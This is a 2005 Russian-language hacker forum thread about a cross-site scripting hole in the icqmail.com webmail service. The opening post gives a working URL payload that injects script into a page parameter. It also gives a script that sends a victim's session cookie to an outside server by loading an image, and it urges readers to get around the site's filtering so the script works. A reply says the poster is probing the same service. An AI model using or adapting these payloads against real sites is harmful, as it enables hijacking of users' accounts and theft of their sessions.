HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

www.icqmail.com [XSS]
  #1  
Старый 23.09.2005, 14:31
PSalm69
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
С нами: 10963106

Репутация: 1060


По умолчанию www.icqmail.com [XSS]

Для тех кто не знал:
На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =)
Код:
http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script>
Довольно распространнённая XSS.
Но, как ни странно есть НО. Посылается письмо на мыло icq@icqmail.com от наивного чукотского парня с примерно вот таким содержанием
Код:
<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>
пройдя через сервер "мыльной аськи" наши старания не увенчаются успехом. Начальный и конечный тег скрипта будет искривлён.
Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт.
Удачи в реале
__________________
ICQ 9731923

 
Ответить с цитированием

  #2  
Старый 23.09.2005, 22:15
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
С нами: 11133086

Репутация: 241
По умолчанию

Неплохо....кстати Я щас и сам раскручиваю сервант асикю, думаю к концу недели предоставлю полный доклад, ибо баг уже найдено впоряде!!!

З.Ы. Кто украдет мои идеи, получит по голове )))))))))))))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
www.pochta.ru [XSS] Barsik Уязвимости 0 15.09.2005 23:39
Love.tut.by [XSS] PSalm69 Уязвимости 2 11.09.2005 12:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.